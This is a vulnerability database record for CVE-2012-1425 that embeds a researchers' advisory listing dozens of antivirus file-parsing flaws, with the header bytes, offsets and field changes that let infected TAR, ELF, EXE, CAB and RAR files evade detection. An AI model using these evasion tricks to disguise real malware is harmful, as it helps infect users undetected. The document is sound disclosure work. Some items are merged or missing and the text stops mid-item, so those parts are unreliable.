  1. In most ELF files, the 5th byte of the header indicates endianness: 01 for little-endian, 02 for big-endian. The Linux kernel, however, does not check this field before loading an ELF file. If the 5th byte of an infected ELF file is set to 02, the antivirus declares the file to be clean, but the ELF file is still executed correctly.

Affected products - AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7

CVE no - CVE-2012-1463

Credits

Vulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov.

References

"Abusing File Processing in Malware Detectors for Fun and Profit" by Suman Jana and Vitaly Shmatikov. To appear in the IEEE Symposium on Security and Privacy 2012: http://www.ieee-security.org/TC/SP2012/



{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201203-0385",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "antivirus",
            scope: "eq",
            trust: 2.4,
            vendor: "fortinet",
            version: "4.2.254.0",
         },
         {
            model: "avl sdk",
            scope: "eq",
            trust: 1.8,
            vendor: "antiy",
            version: "2.0.3.7",
         },
         {
            model: "anti-malware",
            scope: "eq",
            trust: 1.8,
            vendor: "emsisoft",
            version: "5.1.0.1",
         },
         {
            model: "virus utilities t3 command line scanner",
            scope: "eq",
            trust: 1.8,
            vendor: "ikarus",
            version: "1.1.97.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "pc tools",
            version: "7.0.3.5",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "kaspersky",
            version: "7.0.0.125",
         },
         {
            model: "scan engine",
            scope: "eq",
            trust: 1.8,
            vendor: "mcafee",
            version: "5.400.0.1158",
         },
         {
            model: "trend micro antivirus",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "quick heal",
            scope: "eq",
            trust: 1,
            vendor: "cat",
            version: "11.00",
         },
         {
            model: "gateway",
            scope: "eq",
            trust: 1,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 1,
            vendor: "symantec",
            version: "11.0",
         },
         {
            model: "nod32 antivirus",
            scope: "eq",
            trust: 1,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "antivirus \\& antispyware",
            scope: "eq",
            trust: 1,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "nod32 anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "heal",
            scope: "eq",
            trust: 0.8,
            vendor: "quick heal k k",
            version: "11.00",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 0.8,
            vendor: "symantec",
            version: "11 avengine 20101.3.0.103",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "web gateway software",
            scope: "eq",
            trust: 0.8,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "trend micro",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "symantec",
            version: "20101.3103",
         },
         {
            model: "cat-quickheal",
            scope: "eq",
            trust: 0.3,
            vendor: "quick heal",
            version: "11.00",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "pctools",
            version: "7.0.35",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "norman",
            version: "6.6.12",
         },
         {
            model: "mcafee-gw-edition 2010.1c",
            scope: null,
            trust: 0.3,
            vendor: "mcafee",
            version: null,
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "kaspersky",
            version: "7.0125",
         },
         {
            model: "jiangmin",
            scope: "eq",
            trust: 0.3,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus t3.1.1.97.0",
            scope: null,
            trust: 0.3,
            vendor: "ikarus",
            version: null,
         },
         {
            model: "nod32",
            scope: "eq",
            trust: 0.3,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "emsisoft",
            version: "5.11",
         },
         {
            model: "antivir engine",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "7.11.1163",
         },
         {
            model: "antiy-avl",
            scope: "eq",
            trust: 0.3,
            vendor: "antiy",
            version: "2.0.37",
         },
      ],
      sources: [
         {
            db: "BID",
            id: "52580",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Suman Jana and Vitaly Shmatikov",
      sources: [
         {
            db: "BID",
            id: "52580",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2012-1425",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Medium",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4.3,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2012-1425",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  id: "VHN-54706",
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2012-1425",
                  trust: 1.8,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201203-391",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-54706",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \\50\\4B\\03\\04 character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. The TAR file parsers in multiple products contain a vulnerability that can prevent malware detection. If it is announced that the problem also occurs in different TAR parser implementations, this vulnerability may be split into multiple CVEs. A third party may be able to avoid malware detection via a POSIX TAR file that starts with the \\50\\4B\\03\\04 character sequence. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. \nThe following products are affected:\nAVIRA AntiVir Engine 7.11.1.163\nAntiy Antiy-AVL 2.0.3.7\nQuick Heal Technologies CAT-QuickHeal 11.00\nEmsisoft Antivirus 5.1.0.1\nIkarus Antivirus T3.1.1.97.0\nJiangmin 13.0.900\nKaspersky Antivirus 7.0.0.125\nMcAfee 5.400.0.1158\nMcAfee-GW-Edition 2010.1C\nNOD32 5795\nNorman Antivirus 6.06.12\nPCTools Antivirus 7.0.3.5\nSymantec AntiVirus 20101.3.0.103\nTrendMicro 9.120.0.1004\nTrendMicro-HouseCall 9.120.0.1004. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. 
All \naffected products are command-line versions of \nthe AVs. \n\n----------------------------\nVulnerability Descriptions\n----------------------------\n\n1. Specially crafted infected POSIX TAR files with \"[aliases]\" as first 9 bytes \n   evades detection. \n\n   Affected products -\n   ClamAV 0.96.4, CAT-QuickHeal 11.00\n  \n   CVE no - \n   CVE-2012-1419\n\n2. Specially crafted infected POSIX TAR files with \"\\7fELF\" as first 4 bytes \n   evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n   Fortinent 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n   Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, \n   Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1420\n\n3. Specially crafted infected POSIX TAR files with \"MSCF\" as first 4 bytes \n   evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, \n   Symantec 20101.3.0.103\n\n   CVE no - \n   CVE-2012-1421\n\n4. Specially crafted infected POSIX TAR files with \"ITSF\" as first 4 bytes \n   evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1422\n\n5. Specially crafted infected POSIX TAR files with \"MZ\" as first 2 bytes \n   evades detection. \n\n   Affected products -\n   Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, \n   Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, \n   PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0\n\n   CVE no - \n   CVE-2012-1423\n\n6. Specially crafted infected POSIX TAR files with \"\\19\\04\\00\\10\" at offset 8\n   evades detection. \n\n   Affected products -\n   Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, \n   PCTools 7.0.3.5, Sophos 4.61.0\n\n   CVE no - \n   CVE-2012-1424\n\n\n7. 
Specially crafted infected POSIX TAR files with \"\\50\\4B\\03\\04\" as the first\n   4 bytes evades detection. Specially crafted infected POSIX TAR files with \"\\42\\5A\\68\" as the first\n   3 bytes evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n   K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1426\n\n\n9. Specially crafted infected POSIX TAR files with \"\\57\\69\\6E\\5A\\69\\70\" at \n   offset 29 evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n   CVE no - \n   CVE-2012-1427\n\n10. Specially crafted infected POSIX TAR files with \"\\4a\\46\\49\\46\" at offset 6\n   evades detection. \n   \n   Affected products -\n   CAT-QuickHeal 11.00,  Norman 6.06.12, Sophos 4.61.0\n\n   CVE no - \n   CVE-2012-1428\n\n11. Specially crafted infected ELF files with \"ustar\" at offset 257\n   evades detection. \n\n   Affected products -\n   BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, \n   McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01 \n\n   CVE no - \n   CVE-2012-1429\n12. Specially crafted infected ELF files with \"\\19\\04\\00\\10\" at offset 8 evades\n   detection. \n\n   Affected products -\n   BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, \n   McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, \n   Sophos 4.61.0, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1430\n13. Specially crafted infected ELF files with \"\\4a\\46\\49\\46\" at offset 6 evades\n   detection. \n\n   Affected products -\n   BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, \n   F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, \n   nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1431\n\n14. 
Specially crafted infected MS EXE files with \"\\57\\69\\6E\\5A\\69\\70\" at offset\n   29 evades detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1432\n\n15. Specially crafted infected MS EXE files with \"\\4a\\46\\49\\46\" at offset\n   6 evades detection. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1433\n\n16. Specially crafted infected MS EXE files with \"\\19\\04\\00\\10\" at offset\n   8 evades detection. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, \n   Panda 10.0.2.7\n   \n   CVE no - \n   CVE-2012-1434\n\n17. Specially crafted infected MS EXE files with \"\\50\\4B\\4C\\49\\54\\45\" at \n   offset 30 evades detection. \n   \n   Affected products - \n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1435\n\n18. Specially crafted infected MS EXE files with \"\\2D\\6C\\68\" at \n   offset 2 evades detection. \n \n   Affected products - \n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1436\n\n19. Specially crafted infected MS Office files with \"\\50\\4B\\53\\70\\58\" at \n   offset 526 evades detection. \n   \n   Affected products - \n   Comodo 7425\n   \n   CVE no - \n   CVE-2012-1437\n\n20. Specially crafted infected MS Office files with \"ustar\" at \n   offset 257 evades detection. \n\n   Affected products - \n   Comodo 7425, Sophos 4.61.0 \n\n   CVE no - \n   CVE-2012-1438\n\n21. 'padding' field in ELF files is parsed incorrectly. \n    If an infected ELF file's padding field is incremented by 1 it evades\n    detection.    
\n\n   Affected products - \n   eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1439\n\n22. 'identsize' field in ELF files is parsed incorrectly. \n    If an infected ELF file's identsize field is incremented by 1 it evades\n    detection.    \n\n   Affected products - \n   Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, \n   Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1440\n\n23. 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.  \n    If any of these fields in an infected MS EXE file is incremented by 1 \n    it evades detection.    \n\n   Affected products - \n   Prevx 3.0\n\n   'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc',\n    'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and \n    'e_oemid' fields in MS EXE files are parsed incorrectly.  \n    If any of these fields in an infected MS EXE file is incremented by 1 \n    it evades detection.    \n\n   Affected products - \n   eSafe 7.0.017.0, Prevx 3.0\n\n\n   CVE no - \n   CVE-2012-1441\n\n24. 'class' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's class field is incremented by 1 it evades\n    detection. \n\n   Affected products - \n   CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n   eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, \n   Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, \n   Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1442\n\n25. Infected RAR files with initial two bytes set to 'MZ' can be fixed by the \n    user and correctly extracted. Such a file evades detection.  
\n    \n   Affected products -\n   ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, \n   Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, \n   Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, \n   VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, \n   K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 \n   Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, \n   Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, \n   TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0\n   nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, \n   Avast5 5.0.677.0, VBA32 3.12.14.2   \n\n   CVE no - \n   CVE-2012-1443\n\n26. 'abiversion' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's abiversion field is incremented by 1 it evades\n    detection. \n\n   Affected products - \n   eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1444\n\n27. 'abi' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's abi field is incremented by 1 it evades\n    detection. \n\n   Affected products - \n   eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1445\n\n28. 'encoding' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's encoding field is incremented by 1 it evades\n    detection. 'e_version' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's e_version field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n    Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1447\n\n30. 'cbCabinet' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's cbCabinet field is incremented by 1 it evades\n    detection. 
\n\n   Affected products -\n   CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0\n   TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1 \n\n   CVE no - \n   CVE-2012-1448\n\n31. 'vMajor' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's vMajor field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   NOD32 5795, Rising 22.83.00.03\n   \n   CVE no - \n   CVE-2012-1449\n\n32. 'reserved3' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's reserved field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0\n   \n   CVE no - \n   CVE-2012-1450\n\n33. 'reserved2' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's reserved2 field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0\n   \n   CVE no - \n   CVE-2012-1451\n\n34. 'reserved1' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's reserved field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00\n   \n   CVE no - \n   CVE-2012-1452\n\n35. 'coffFiles' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's coffFiles field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, \n   Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C,\n   Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402,\n   Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1453\n\n36. 'ei_version' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's version field is incremented by 1 it evades\n    detection. 
